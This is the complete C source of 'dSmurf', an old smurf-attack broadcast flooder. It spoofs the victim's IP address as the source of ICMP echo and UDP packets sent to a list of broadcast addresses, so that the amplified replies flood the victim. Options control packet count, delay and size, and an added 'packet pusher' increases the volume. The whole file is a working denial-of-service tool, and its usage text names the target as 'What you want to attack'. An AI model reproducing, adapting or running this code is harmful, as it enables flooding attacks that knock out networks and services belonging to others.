#include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __USE_BSD #undef __USE_BSD #endif #include #include #include /* Defines */ #define VERSION "6+LPG" #define REGISTERED_TO "Xess0r" #define RELEASE_DATE "Feb 1'st, 1999 - Too a new month of chaos" struct smurf_t { struct sockaddr_in sin; /* socket prot structure */ int s; /* socket */ int udp, icmp; /* icmp, udp booleans */ int rnd; /* Random dst port boolean */ int psize; /* packet size */ int chutimes, chusize, chuc; /* int those pushers */ int num; /* number of packets to send */ int delay; /* delay between (in ms) */ int verbose; /* verbose anyone? */ u_short dstport[25+1]; /* dest port array (udp) */ u_short srcport; /* source port (udp) */ char *padding; /* junk data */ }; /* function prototypes */ void usage (char *); void ctrlc(int); u_long resolve (char *); void getports (struct smurf_t *, char *); void smurficmp (struct smurf_t *, u_long); void smurfudp (struct smurf_t *, u_long, int); u_short in_chksum (u_short *, int); int main (int argc, char *argv[]) { struct smurf_t sm; struct stat st; struct sockaddr_in sin; u_long bcast[1024]; char buf[32]; int c, fd, n, cycle, sock, num = 0, on = 1; FILE *bcastfile; system("clear"); printf("\n\n\n\n\n-WaR- dSmurf %s - Broadcast Flooder\n",VERSION); printf("-WaR- Author: TFreak + Modes by: DeathRoad\n"); printf("-WaR- Registered to: %s\n",REGISTERED_TO); printf("-WaR- Released on: %s\n",RELEASE_DATE); printf("-WaR- v.Note: Added a packet pusher to help the attack on more powerful machines.\n\n"); if (argc < 3) usage(argv[0]); /* set defaults */ memset((struct smurf_t *) &sm, 0, sizeof(sm)); sm.icmp = 1; sm.psize = 64; sm.num = 0; sm.delay = 10000; sm.sin.sin_port = htons(0); sm.sin.sin_family = AF_INET; sm.srcport = 0; sm.dstport[0] = 7; sm.verbose = 0; sm.chutimes = 0; sm.chusize = 500; sm.chuc = 0; /* resolve 'source' host, quit on error */ sm.sin.sin_addr.s_addr = resolve(argv[1]); /* open the broadcast file */ if ((bcastfile = fopen(argv[2], "r")) == NULL) { perror("Opening broadcast file"); exit(-1); } /* parse out options */ optind = 3; while ((c = getopt(argc, argv, "vrRn:d:p:P:s:S:f:c:C:")) != -1) { switch (c) { /* random dest ports */ case 'r': sm.rnd = 1; break; /* random src/dest ports */ case 'R': sm.rnd = 1; sm.srcport = 0; break; /* number of packets to send */ case 'n': sm.num = atoi(optarg); break; /* usleep between packets (in ms) */ case 'd': sm.delay = atoi(optarg); break; /* Times to run packet pusher */ case 'c': sm.chutimes = atoi(optarg); break; /* Size of the packets */ case 'C': sm.chusize = atoi(optarg); break; /* quite mode */ case 'v': sm.verbose = 1; break; /* multiple ports */ case 'p': if (strchr(optarg, ',')) getports(&sm, optarg); else sm.dstport[0] = (u_short) atoi(optarg); break; /* specify protocol */ case 'P': if (strcmp(optarg, "icmp") == 0) { /* this is redundant */ sm.icmp = 1; break; } if (strcmp(optarg, "udp") == 0) { sm.icmp = 0; sm.udp = 1; break; } if (strcmp(optarg, "both") == 0) { sm.icmp = 1; sm.udp = 1; break; } puts("Error: Protocol must be icmp, udp or both"); exit(-1); /* source port */ case 's': sm.srcport = (u_short) atoi(optarg); break; /* specify packet size */ case 'S': sm.psize = atoi(optarg); break; /* filename to read padding in from */ case 'f': /* open and stat */ if ((fd = open(optarg, O_RDONLY)) == -1) { perror("Opening packet data file"); exit(-1); } if (fstat(fd, &st) == -1) { perror("fstat()"); exit(-1); } /* malloc and read */ sm.padding = (char *) malloc(st.st_size); if (read(fd, sm.padding, st.st_size) < st.st_size) { perror("read()"); exit(-1); } sm.psize = st.st_size; close(fd); break; default: usage(argv[0]); } } /* end getopt() loop */ /* create packet padding if neccessary */ if (!sm.padding) { sm.padding = (char *) malloc(sm.psize); memset(sm.padding, 0, sm.psize); } /* create the raw socket */ if ((sm.s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) { perror("Creating raw socket (are you root?)"); exit(-1); } /* Include IP headers ourself (thanks anyway though) */ if (setsockopt(sm.s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("setsockopt()"); exit(-1); } /* read in our broadcasts and store them in our array */ while (fgets(buf, sizeof buf, bcastfile) != NULL) { char *p; int valid; /* skip over comments/blank lines */ if (buf[0] == '#' || buf[0] == '\n') continue; /* get rid of newline */ buf[strlen(buf) - 1] = '\0'; /* check for valid address */ for (p = buf, valid = 1; *p != '\0'; p++) { if ( ! isdigit(*p) && *p != '.' ) { fprintf(stderr, "Skipping invalid ip %s\n", buf); valid = 0; break; } } /* if valid address, copy to our array */ if (valid) { bcast[num] = inet_addr(buf); num++; if (num == 1024) break; } } /* end bcast while loop */ /* Make sure the packets arn't too big */ if(sm.psize > 1024) { perror("Packet size (less then 1024)"); exit(-1); } /* seed our random function */ srand(time(NULL) * getpid()); printf("- (dS) - Victim : %s\n",argv[1]); printf("- (dS) - Bcast : %s\n",argv[2]); if (sm.srcport == 0) printf("- (dS) - SPort : Random\n"); else printf("- (dS) - SPort : %d\n",sm.srcport); if (!sm.num) printf("- (dS) - Number : Unlimited\n"); else printf("- (dS) - Number : %d\n",sm.num); if (sm.rnd == 1) printf("- (dS) - Random : Dest\n"); if (sm.udp) { if(!sm.rnd) printf("- (dS) - Port : %d\n",sm.dstport[0]); } printf("- (dS) - Wait : %d\n",sm.delay); printf("- (dS) - Size : %d\n",sm.psize); if (sm.icmp) printf("- (dS) - Protocols : ICMP\n"); if (sm.udp) printf("- (dS) - Protocols : UDP\n"); if (sm.chutimes > 0) { printf("- (dS) - Pushing : %d Times\n",sm.chutimes); printf("- (dS) - Pushing : %d Bytes\n",sm.chusize); } if (sm.verbose == 1) printf("[Flooding (each dot is 100 packets)]\n"); if (sm.verbose == 0) printf("[Flooding]\n\n"); /* wee.. */ for (n = 0, cycle = 0; n < sm.num || !sm.num; n++) { if (sm.icmp) smurficmp(&sm, bcast[cycle]); if (sm.udp) { int x; for (x = 0; sm.dstport[x] != 0; x++) smurfudp(&sm, bcast[cycle], x); } /* quick nap */ usleep(sm.delay); /* cosmetic psychadelic dots */ if (sm.verbose == 1) { if (n % 100 == 0) { printf("."); fflush(stdout); } } cycle = (cycle + 1) % num; /* lets add CHU */ if(sm.chutimes > 0) { if(sm.chusize > 1024) { printf("CHU size is too big!\n"); exit(-1); } if(sm.chutimes > 50) { printf("CHU times is too big!\n"); exit(-1); } for(;sm.chuc<=sm.chutimes;sm.chuc++) smurficmp(&sm, bcast[cycle]); /* exit(1); */ } } exit(0); } void usage (char *s) { printf("-W- Usage:\n"); printf("-W- %s <source host> <brodcast file> [-p ports] [-s port] [-P protocols] [-S size] [-f file] [-n number] [-d time] [-c times] [-C size] [-r] [-R] [-v]\n",s); printf("-W- source host : What you want to attack [Example: 192.0.0.1]\n"); printf("-W- brodcast file : File where the bordcast IP's are [Example: bcasts]\n"); printf("-W- -p <ports> : Comma separated list of dest ports (UDP) [Deafult: 7]\n"); printf("-W- -s <port> : Source port [Deafult: RANDOM]\n"); printf("-W- -P <protocols> : Protocols to use [Example: icmp, udp, both]\n"); printf("-W- -S <size> : Packet size in bytes (< 1024) [Deafult: 64]\n"); printf("-W- -f <file> : Filename containg packet data [Example: pdata]\n"); printf("-W- -n <number> : Number of packets to send [Deafult: UNLIMITED]\n"); printf("-W- -d <time> : Delay inbetween packets (in ms) [Deafult: 10000]\n"); printf("-W- -c <times> : Times to run packet pusher (< 50) [Deafult: 0]\n"); printf("-W- -C <size> : Size of packets being pushed (< 1024) [Deafult: 500]\n"); printf("-W- -r : Use random dest ports\n"); printf("-W- -R : Use random src/dest ports\n"); printf("-W- -v : Show how many packets are being sent\n\n"); exit(-1); } u_long resolve (char *host) { struct in_addr in; struct hostent *he; /* try ip first */ if ((in.s_addr = inet_addr(host)) == -1) { /* nope, try it as a fqdn */ if ((he = gethostbyname(host)) == NULL) { /* can't resolve, bye. */ herror("Resolving victim host"); exit(-1); } memcpy( (caddr_t) &in, he->h_addr, he->h_length); } return(in.s_addr); } void getports (struct smurf_t *sm, char *p) { char tmpbuf[16]; int n, i; for (n = 0, i = 0; (n < 25) && (*p != '\0'); p++, i++) { if (*p == ',') { tmpbuf[i] = '\0'; sm->dstport[n] = (u_short) atoi(tmpbuf); n++; i = -1; continue; } tmpbuf[i] = *p; } tmpbuf[i] = '\0'; sm->dstport[n] = (u_short) atoi(tmpbuf); sm->dstport[n + 1] = 0; } void smurficmp (struct smurf_t *sm, u_long dst) { struct iphdr *ip; struct icmphdr *icmp; char *packet; int pktsize = sizeof(struct iphdr) + sizeof(struct icmphdr) + sm->psize; packet = malloc(pktsize); ip = (struct iphdr *) packet; icmp = (struct icmphdr *) (packet + sizeof(struct iphdr)); memset(packet, 0, pktsize); /* fill in IP header */ ip->version = 4; ip->ihl = 5; ip->tos = 0; ip->tot_len = htons(pktsize); ip->id = htons(getpid()); ip->frag_off = 0; ip->ttl = 255; ip->protocol = IPPROTO_ICMP; ip->check = 0; ip->saddr = sm->sin.sin_addr.s_addr; ip->daddr = dst; /* fill in ICMP header */ icmp->type = ICMP_ECHO; icmp->code = 0; icmp->checksum = htons(~(ICMP_ECHO << 8)); /* thx griffin */ /* send it on its way */ if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin, sizeof(struct sockaddr)) == -1) { perror("sendto()"); exit(-1); } free(packet); /* free willy! */ } void smurfudp (struct smurf_t *sm, u_long dst, int n) { struct iphdr *ip; struct udphdr *udp; char *packet, *data; int pktsize = sizeof(struct iphdr) + sizeof(struct udphdr) + sm->psize; packet = (char *) malloc(pktsize); ip = (struct iphdr *) packet; udp = (struct udphdr *) (packet + sizeof(struct iphdr)); data = (char *) (packet + sizeof(struct iphdr) + sizeof(struct udphdr)); memset(packet, 0, pktsize); if (*sm->padding) memcpy((char *)data, sm->padding, sm->psize); /* fill in IP header */ ip->version = 4; ip->ihl = 5; ip->tos = 0; ip->tot_len = htons(pktsize); ip->id = htons(getpid()); ip->frag_off = 0; ip->ttl = 255; ip->protocol = IPPROTO_UDP; ip->check = 0; ip->saddr = sm->sin.sin_addr.s_addr; ip->daddr = dst; /* fill in UDP header */ if (sm->srcport) udp->source = htons(sm->srcport); else udp->source = htons(rand()); if (sm->rnd) udp->dest = htons(rand()); else udp->dest = htons(sm->dstport[n]); udp->len = htons(sizeof(struct udphdr) + sm->psize); // udp->check = in_chksum((u_short *)udp, sizeof(udp)); /* send it on its way */ if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin, sizeof(struct sockaddr)) == -1) { perror("sendto()"); exit(-1); } free(packet); /* free willy! */ } /* if CTRL+C was pressed, exit the process and print out a little message */ void ctrlc (int ignored) { puts("[Done!]\n\n"); exit(1); } u_short in_chksum (u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); }